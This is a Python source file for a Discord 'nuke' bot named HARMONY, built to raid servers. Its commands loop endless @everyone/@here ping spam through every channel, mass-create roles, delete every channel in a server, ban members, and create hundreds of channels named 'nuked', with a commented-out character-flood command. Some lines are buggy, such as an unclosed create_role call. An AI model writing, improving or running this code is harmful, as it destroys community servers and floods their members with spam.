import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get

 
#Prefix

bot = commands.Bot(command_prefix='~')

client = commands.Bot(command_prefix='~')

#toggle help command
#bot.remove_command('help')

print("HARMONY\n")
print("written by ilumn")
print(" _   _    _    ____  __  __  ___  _   ___   __\n| | | |  / \\  |  _ \\|  \\/  |/ _ \\| \\ | \\ \\ / /\n| |_| | / _ \\ | |_) | |\\/| | | | |  \\| |\\ V /\n|  _  |/ ___ \\|  _ <| |  | | |_| | |\\  | | |\n|_| |_/_/   \\_|_| \\_|_|  |_|\\___/|_| \\_| |_|")
print("https://github.com/ilumn/Harmony\n")

#status event
@bot.event
async def on_ready():
#status
    print("Bot Is Getting Ready To Nuke.")
    print("Bot Status: Ready")
    
    
    
# WIP # @bot.command()
# WIP # async def reload(ctx):
# WIP #     await ctx.message.delete()
# WIP #     print('reloading')
# WIP #     os.system('python3 nuke.py')
# WIP #     exit()



#ban command
@bot.command(pass_context=True)
async def ban(ctx, member : discord.Member):
    await member.ban()
    await ctx.message.delete()


    


@bot.command(pass_context=True)
async def serverinfo(ctx):
    await ctx.message.delete
    guild = ctx.message.guild
    print(guild.channels)
    for channel in guild.channels:
        print(channel.id)

# currently broken as this character isnt supported in the UTF-8 encoding #longchar = "﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽﷽"

#spam long character
#@bot.command(pass_context=True)
#async def spamblank(ctx):
#    await ctx.message.delete()
#    while True:
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
#       await ctx.send(longchar) 
        

 
#spam ping command
@bot.command(pass_context=True)
async def spamping(ctx):
    await ctx.message.delete()
    print("---------------\nstarted pinging\n---------------")
    while True:
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n") 
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
        await ctx.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")

        
#role spam command
@bot.command(pass_context=True)
async def roles(ctx):
    await ctx.message.delete()
    while True:
        guild = ctx.guild
        await guild.create_role(name("abcdefghijklmnopqrstuvwxyz")
        print("--------------------")
        print("role was created")
        print("--------------------")

@bot.command(pass_context=True)
async def pingall(ctx):
    await ctx.message.delete()
    print("---------------\nstarted pinging\n---------------")
    while True:
        guild = ctx.message.guild
        for channel in guild.channels:
            try:
                await channel.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
                print("--------------------")
                print("pinged in")
                print(channel)
                print("--------------------")
                await channel.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
                print("--------------------")
                print("pinged in")
                print(channel)
                print("--------------------")
                await channel.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
                print("--------------------")
                print("pinged in")
                print(channel)
                print("--------------------")
                await channel.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
                print("--------------------")
                print("pinged in")
                print(channel)
                print("--------------------")
                await channel.send("@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n@everyone @here\n")
                print("--------------------")
                print("pinged in")
                print(channel)
                print("--------------------")
            except:
                continue
@bot.command(pass_context=True)
async def wipe(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    print(guild.channels)
    for channel in guild.channels:
        await channel.delete()
        print("--------------------")
        print(channel)
        print("no longer exists")
        print("--------------------")
    

#channel spam command
@bot.command(pass_context=True)
async def channels(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    await guild.create_text_channel('nuked') 
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
